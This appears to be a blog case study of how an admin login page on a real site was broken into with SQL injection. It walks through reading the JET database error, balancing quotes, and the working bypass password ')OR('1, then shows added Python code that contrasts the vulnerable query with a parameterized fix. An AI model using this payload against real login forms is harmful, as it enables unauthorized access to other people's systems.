This is a case study of a site that was broken into. I will often be posting case studies to show different ways of fuzzing.
Here I am sharing the way the admin panel was broken.
So, I had the admin login page in front of me. The very first thing I can try is to insert a garbage value to see the response. If we get an error directly from the database, it's good; otherwise it's a different story.
I entered the username as 'admin', and for the password I entered '
Microsoft JET Database Engine error '80040e14'
Syntax error in string in query expression '(UID='admin' AND PWD=''');'
Awesome, we got an error here. Let's try to understand the error.
The moment I entered ', the normal functionality broke, which means the insertion of ' made the query unbalanced somewhere.
'(UID='admin' AND PWD=''');'
Remove the outer '
(UID='admin' AND PWD=''');
Remove the ;
(UID='admin' AND PWD=''')
Let's break it down and try to understand.
' ( UID = ' <user_input> ' AND PWD = ' <user_input> ' ) ;'
When the username is: admin and the password is: '
' ( UID = ' admin ' AND PWD = ' ' ' ) ;'
If the password is: ')
' ( UID = ' admin ' AND PWD = ' ' ) ' ) ;'
The left side is kind of balanced, but we still have an extra single quote.
If the password is: ')OR('1'
' ( UID = ' admin ' AND PWD = ' ' ) OR ( ' 1 ' ) ;'
It seems balanced, let's check it out.
So I am checking with username: admin, password: ')OR('1'
Oops, got an error:
Syntax error in string in query expression '(UID='admin' AND PWD='')OR('1'');'.
[I made this error on purpose, to show you how to learn from errors]
After analysing the error, I see
PWD=' ')OR('1' '
Unbalanced quotes, my bad. We need to remove the last single quote from our query.
So again, our username: admin, and password: ')OR('1
Whoops, it said Welcome Admin.
This is just to show that using some predefined SQL query for breaking panels is often useless, because fuzzing always depends on the way the developers built it.
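The login check walked through above, rebuilt as an added example (not code from the site in this post) with the string-built query beside a parameterized one, run over the three password values from the post. It assumes Python's built-in SQLite in place of the JET engine; the `users` table, the stored password and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data: one admin row in an in-memory database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (UID TEXT, PWD TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'constructed-secret')")
    return db

def login_concat(db, uid, pwd):
    """Vulnerable form: input is pasted into the query text, giving the
    (UID='...' AND PWD='...') shape seen in the error message."""
    sql = ("SELECT COUNT(*) FROM users WHERE (UID='" + uid +
           "' AND PWD='" + pwd + "')")
    try:
        return "welcome" if db.execute(sql).fetchone()[0] else "denied"
    except sqlite3.Error:
        # The site in the post showed the raw database error to the visitor.
        # A hardened page logs it server-side and returns a generic failure.
        return "syntax error"

def login_param(db, uid, pwd):
    """Hardened form: the query text is fixed and the input is bound as
    data, so a quote in the password can never change the query structure."""
    sql = "SELECT COUNT(*) FROM users WHERE (UID=? AND PWD=?)"
    return "welcome" if db.execute(sql, (uid, pwd)).fetchone()[0] else "denied"

# The three password values tried in the post, in order.
PAGE_INPUTS = ["'", "')OR('1'", "')OR('1"]

def compare():
    db = make_db()
    return [(pwd, login_concat(db, "admin", pwd), login_param(db, "admin", pwd))
            for pwd in PAGE_INPUTS]

if __name__ == "__main__":
    for pwd, concatenated, parameterized in compare():
        print(f"{pwd!r:12} concat={concatenated:13} param={parameterized}")
```

The concatenated version reproduces the two syntax errors and the final login from the post, while the parameterized version answers "denied" for all three.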
That's all for this post.